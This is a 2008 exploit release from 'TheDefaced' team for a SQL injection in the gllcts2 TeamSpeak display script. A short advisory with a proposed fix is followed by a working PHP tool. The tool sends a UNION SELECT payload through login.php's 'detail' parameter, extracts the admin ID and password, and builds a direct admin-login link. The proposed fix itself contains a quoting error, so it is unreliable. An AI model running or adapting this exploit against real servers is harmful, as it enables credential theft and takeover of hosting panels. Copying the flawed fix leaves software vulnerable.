gllcts2-sql.txt
Posted on 13 June 2008
<?php /* 08000000088@M@@@M@2ZZZ8@aZX;ii,,:,iir777777777777777777777777r;i:, i ,@X:i:0a7 BMMM88000000000 08888888882aMMMMM,SZZ0WZ ........ 7a2MMMMM : MMM@aZ888888888 08888888888WMMMMM78aSXi XBMMMMMMMMMMMMMM2: MB.X:. ,SMMMMMMMMMMMM. r: MMM0a8888888888 0888888888ZZMMMMS : .:i;X28MMMMMMMM,22Z2XSaSir7ii2MMMMMMM@Z222Z0BMMM iZMMMM8Z8888888888 088888888882BMMM :MSMMMMMMMMMM@@WB80MMMMMMMM ,;r7XXXSSX.SMMM, .:ZMMMMMMBX. MMMM8a8888888888 08888888888a2MMM8MMW MM ,,ZMMMM i@B:WMMMMMMB8Z8MMMMMMMMMMX ZMMWaZ8888888888 088888888ZZaS@MZiiMMMMMB:a@MMMMMMMMMMMM@ZX:aMMMMMM:MMMM0MMMM iXa8ri ;MMMMMMMMMMBS88888888888 0888888Za8MMMMM ,ZMMMMM,SaaZM2 ;M.Mr XM;SWW MMMMMMMMMMMMB,7ZMMMZMaMMZ. ;BBM MMZXSMMMMBS2a888888888 088888ZZMMM0XMMXMMMSMMa;aaaBa M8M@ M MBi2 MMMMMMMMMMMM.2ZZ8M MMM7 S @M@ .MMMMM XMMMMMZZ8888888 088888a@M MMM @MSraa8MX ;7Z@ X MMMM BMMMiaMMMM. SXaX .2ZM MMMM MMM MM8Z888888 088888aMa Ma MW M@i0MMM 7Sr. :r7i. MMM ,: MMM;8 .i,,.iri MMM MM rMB MMa888888 08888Z2MSMMMMM BZ MMrW rr ;MM ,::, @MMaM :XX7, MM MM ;XMM Ma888888 08888Z2MXW M MMX MMB T :XZa. MM :.::: :MM D 2MM Z7 ;. M,Ma888888 088888aMi M MMMMrB MM .i. MM. iW.::: :@MX MM XM, ., MMWa888888 088888aM@ M MMMMiZ2 MM. MM :Za ::: r MM: MM MMMM aMM8Z888888 088888ZBM M MM SXB MMM2 ZMMM X2a;.:::.,X MMM MM aMMMM MMMaZ888888 0888888ZMM M M B7a8 r2MMMMMMMMMMMMM7 aSXZ ,:::: i; ,MMMX .@MMM7: MMMM 0MMZa8888888 0888888Z8M; M M W7XZZ :;77X2Z8aX, iaX77a :::::: Mr aMMMMMMMMMMMMMi ,0; MMMM .MMZa88888888 08888888a@M ZM @X7X8r WX77Xa ::::,,, Mi SaS7i..,rrXXW :MM @@MMWaZ88888888 088888888aMMMB ZS77X07 .2 ,S ,::..: MZS 220 ZaS BMM2Z888888888 0888888888aZMM ia777X0 R MMMMX ; S. MM, T 020 SX,;Mr M028888888888 08888888888aaMB i7777SW MMMMMM;:r,MMMMMMM 0aa8 W M MBZ8888888888 088888888888a0MMMM ;rrrr2Z M SM2SWM7 X; ;ZXZ .2 MMMMMMZZ8888888888 0800000000008ZaSaMi7XXXXSBr.,,,,,,,,,,,:rXS: ,. .: :S:,,,,,,,,..B2SZ 2SrMMMBa2Z80000000000 / | TheDefaced.org | |__________________________________________________________________________________________________| | | | Presents... | | Exploit - Vulnerability & Fix | | SQL Injection in gllcts2 >= 4.2.4 | | ------------------------------------------------------------------------------------------------ | | Description | | ------------------------------------------------------------------------------------------------ | | The following script is used for displaying teamspeak information by users and allowing others | | to login to these servers and etc. | | | | It's most commonly used by teamspeak hosting companys which makes it kinda bad that this exists. | | | | ------------------------------------------------------------------------------------------------ | | Vulnerability | | ------------------------------------------------------------------------------------------------ | | Although the following script has multiple sql injections there is only one which we really... | | Found to be useful enough to include inside of the exploit code. | | | | So that is the only one that we will go into detail with below... | | | | If we go to login.php and view the line 20 | | | We see the following code... | | | | <?php | | $r = query("SELECT * FROM $dbtable1 WHERE server_id='$_GET[detail]'"); | | ?> | | | | If you understand php you can see from this that the code is not properly sanatized before being.| | Put into the query and executed... The way it is currently would allow a remote attacker to... | | Add on SQL in order to preform a sql injection. | | | | ------------------------------------------------------------------------------------------------ | | FIX | | ------------------------------------------------------------------------------------------------ | | Take the code at login.php line 20 and make it the following... | | | | <?php | | $userinput = mysql_real_escape_string($_GET[detail]); | | $r = query("SELECT * FROM $dbtable1 WHERE server_id='$userinput"); | | ?> | | ------------------------------------------------------------------------------------------------ | | CREDITS | | ------------------------------------------------------------------------------------------------ | | The vulnerability was discovered remotely by DeadlyData and Kap of TheDefaced Security Team | | It was then looked at via source code and the script was fully audited to find it was more... | | Vulnerable then we had thought in total there are about 5 un sanatized user based inputs. | | | | Which may lead to more vulnerabilties such as other SQL injections or XSS flaws. | | ------------------------------------------------------------------------------------------------ | | EXPLOIT CODE... | | ------------------------------------------------------------------------------------------------ | | !NOTE!: Requires Magic Quotes GPC is set to off in your php.ini settings. | | | \__________________________________________________________________________________________________/ */ set_time_limit(0); ignore_user_abort(0); function add_html_space($count){ $out2 = str_repeat(" ",$count); return $out2; } function write_content($title,$desc,$content){ $out = "<div class='content'><div class='item'><h1>$title</h1><div class='descr'>$desc</div><br><p>$content</p></div>"; return $out; } $title = "GLLCTS2 => v4.2.4". add_html_space(1) ." SQL Injection Exploit"; $header['banner'] = "TD's ESystem"; $header['main'] = "TD's Exploit System"; $menu['title'] = "Exploit System"; $menu['title1'] = "Esystem Home"; $menu['link1'] = "?"; $menu = "<div class="sidenav"><h1>".$menu['title']."</h1><ul><li><a href='".$menu['link1']."'>".$menu['title1']."</a></li></ul><h1>Links To TD</h1><ul><li><a href="http://www.thedefaced.org">Go To TheDefaced</a></li><li><a href="http://www.thedefaced.org/forums/">Go To TheDefaced Forums</a></li></ul></div>"; $copyright = "</div><div class="clearer"><span></span></div></div><br><div class="footer">© 2004 - 2008 <a href="?">The Defaced Security Team.</a><br>© 2008 $title By TheDefaced.org</div></span></div></div></body></html>"; $style = "<html><head><link rel="stylesheet" type="text/css" href="http://thedefaced.org/default_orig.css" media="screen"/><title>$title</title></head><body><div id="thedefaced"><div class="container"><span><div class="main"><div class="header"><div class="title"><font size="0.1"><a href="http://www.thedefaced.org">$header[banner]</a></font></div></td></td></TABLE></td></tr></table></form></div><div class="footer"><b>$header[main]</a></b></div>$menu"; echo $style; switch($_GET['page']){ default: If($_POST['inj'] == 'run'){ echo"<div class='content'>"; echo"<div class='item'><h1>TD's Exploit System</h1>"; echo"<div class='descr'>Grabing Admin ID and Password via GLLC SQL injection.</div>"; echo"<br><p>"; $url = $_POST['url']; $prefix = $_POST['prefix']; $buf = file_get_contents($url."/login.php?detail='%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11,concat(CHAR(124),CHAR(65,%2068,%2077,%2073,%2078,%2073,%2068,%2058),admin_id,CHAR(124),CHAR(80,%2065,%2083,%2083,%2058),admin_pass,CHAR(124)),13,14,15,16,17,18,19,20,21,22,23%20from%20".$prefix."_admin/*"); $arr = explode("|",$buf); foreach($arr as $line){ if(eregi("ADMINID:", $line)) If($line !=$adminid){ $adminid = $line; echo $adminid."<br>"; } if(eregi("PASS:",$line)) If($pass == ""){ $pass = $line; $pass_parsed = str_replace("PASS:","",$pass); echo $pass."<br><br>"; echo "<a href='$url/admin/index.php?pass=$pass_parsed'>Login</a>"; } } echo"</font></b></p></div>"; echo $copyright; }else{ echo write_content("Welcome to TD's Exploit System","SQL injection exploit in GLLCTS2","<form method='post' action='?'><center><input type='hidden' name='inj' value='run'>GLLCTS2 URL(No Trailing "/" & Include "http://"):<br><input type='text' size='25' name='url'><br><br>Table Prefix:<br>". add_html_space(1) ."<input type='text' size='20' name='prefix' value='gllcts2'><br><br><input type='submit' value='Get Admin Info'></form>"); echo $copyright; } break; } ?>
